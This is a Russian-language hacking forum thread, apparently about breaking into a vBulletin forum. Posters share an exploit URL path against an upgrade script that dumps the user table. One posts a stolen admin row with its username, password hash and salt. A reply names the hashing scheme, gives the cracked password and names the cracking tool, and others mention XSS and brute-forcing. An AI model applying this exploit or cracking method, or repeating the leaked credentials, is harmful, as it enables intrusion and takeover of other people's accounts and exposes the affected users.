for KruGoZor всё так. и от скрипта не зависит. как сплойт проще заюзать /install/upgradecore.php?do=sqltable&table=user&step[] где user - предполагаемое имя таблицы с хэшами юзверей
INSERT INTO user VALUES('1','6','','0','LORD ALUCARD','a7e65433b82e964d3c0c0719115b63f8','2006-07-23','','0','','','','','','','','2','1','Древнее Зло','1','1153657920','0','1163931713','1163949280','1163931841','40','10','5','3','0','0','0','0','2135','07-14-1988','1988-07-14','-1','1','','0','0','0','0','-1','21','0','sab'); плииз поможите ещё сгенерить пароль...или скажите как по шагам))) где соль я тоже не могу найти (sab чтоли??)
хэш: a7e65433b82e964d3c0c0719115b63f8 соль: sab метод шифрования: md5(md5($pass).$salt) PHP: пароль: 253839 =))) юзал PasswordPro 2.2.1.2
Что то никто ничего толком не предложил... Exploit наверно нет... XSS я думаю все нашли... но это гимморойно....
Хэш брутить мона прогой PasswordPro, но если пароль не дико простой, то на это у тебя уйдёт пару десятков лет
